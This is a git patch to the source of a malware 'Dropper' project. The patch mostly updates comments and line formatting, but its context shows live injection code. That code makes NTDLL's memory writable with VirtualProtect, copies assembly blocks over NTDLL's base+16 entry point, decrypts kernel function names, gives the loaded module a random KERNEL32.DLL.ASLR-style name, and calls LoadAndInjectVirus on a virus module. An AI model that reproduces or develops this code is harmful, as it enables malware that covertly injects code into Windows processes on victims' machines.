From b39a58ef6a0a093409c7f191e3e812403e13a4fc Mon Sep 17 00:00:00 2001
From: "Michael R. Torres"
Date: Tue, 11 Oct 2016 20:11:22 -0700
Subject: [PATCH] Update comments on the injection process

---
 Dropper/AssemblyBlock0.c | 3 ++-
 Dropper/CodeBlock.c | 4 ++--
 Dropper/MemorySections.c | 11 ++++++-----
 3 files changed, 10 insertions(+), 8 deletions(-)

diff --git a/Dropper/AssemblyBlock0.c b/Dropper/AssemblyBlock0.c
index cb5c60e..4399860 100644
--- a/Dropper/AssemblyBlock0.c
+++ b/Dropper/AssemblyBlock0.c
@@ -21,7 +21,8 @@ ** ASSEMBLY BLOCK 0. ** *************************************************************************/
-// This is the first bit of code injected into NTDLL at base + 16
+// This replaces the builtin MSDOS stub that usually checks for compatability
+// ( the infamous "This program cannot be run in DOS mode")
 void __declspec(naked) __ASM_BLOCK0_0(void)
 {
 __asm
diff --git a/Dropper/CodeBlock.c b/Dropper/CodeBlock.c
index 0461c29..e8544f9 100644
--- a/Dropper/CodeBlock.c
+++ b/Dropper/CodeBlock.c
@@ -223,7 +223,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P
 hHandleNTDLL = pHardAddrs->NTDLL_DLL;
 if(!pHardAddrs->NTDLL_DLL) return 0;
- NTDLL_Entry = (void *)(hHandleNTDLL + 16); // Presumably the entry point
+ NTDLL_Entry = (void *)(hHandleNTDLL + 16);
 if(*(_DWORD *)(hHandleNTDLL + 16) == 0xAB49103B) return 0; // Check if the code has been already injected
 if(pHardAddrs->VirtualProtect(hHandleNTDLL, 0x1000, PAGE_EXECUTE_WRITECOPY, &dwOld))
@@ -231,7 +231,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P
 // Copy code into ntdll entry point...
 BLOCK4_memcpy(NTDLL_Entry, (const void *)sASMCodeBlocksHeader->ASMBlock0Segment.SegmentAddress, sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize);
- // ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX because __thiscall
+ // ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX( because __thiscall )
 ((void (__thiscall *)(void *))sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress)(NTDLL_Entry); // __thiscall ignored by compiler
 pHardAddrs->FlushInstructionCache((HANDLE)-1, NULL, 0);
diff --git a/Dropper/MemorySections.c b/Dropper/MemorySections.c
index e96665b..17c09a4 100644
--- a/Dropper/MemorySections.c
+++ b/Dropper/MemorySections.c
@@ -207,14 +207,16 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
 GENERAL_INFO_BLOCK sInfoBlock; // [sp+4h] [bp-80h]@1
 // Get a random module name with the format "KERNEL32.DLL.ASLR.XXXXXXXX"
- if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0) return 0;
+ if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0)
+ return 0;
 // Decrypt the Kernel32's and NTDLL's function names
- if(bSetup && DecodeEncryptedModuleNames() == FALSE) return -12;
+ if(bSetup && DecodeEncryptedModuleNames() == FALSE)
+ return -12;
- // Last 4 arguments seem to have been mangled, as -1 is a nonsensical index.
 iResult = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR);
- if(iResult) return iResult;
+ if(iResult)
+ return iResult;
 // One-time
 if(bSetup)
@@ -225,7 +227,6 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
 bSetup = FALSE;
 }
- // Unknown
 iResult = LoadAndInjectVirus((PASM_CODE_BLOCKS_HEADER)s_ASMCodeBlocksPTR, (PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR, &sInfoBlock);
 if(!iResult) *hVirusModule = ((PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR)->VirusModulePointer;